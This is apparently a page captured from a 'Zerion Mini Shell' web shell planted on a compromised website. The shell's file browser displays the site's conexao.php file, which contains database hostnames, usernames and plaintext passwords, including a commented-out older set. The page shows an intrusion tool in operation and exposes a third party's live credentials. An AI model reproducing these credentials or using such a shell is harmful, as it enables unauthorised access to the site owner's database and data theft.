ok

Mini Shell

Direktori : /home/pequenacapitolio/www/
Upload File :
Current File : /home/pequenacapitolio/www/conexao.php

<?php
$conn;
try {
    //$conn = new PDO('mysql:host=robb0459.publiccloud.com.br:3306;dbname=adaptweb2_pequena_capitolio', "adapt_pequena", "8Yfv5h!1", null);
    $conn = new PDO('mysql:host=mysql38-farm15.uni5.net:3306;dbname=pequenacapitol', "pequenacapitol", "8Yfv5h123", null);
    $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $conn->exec("set names utf8");
} catch(PDOException $e) {
    echo 'ERROR: ' . $e->getMessage();
    
}
?>

Zerion Mini Shell 1.0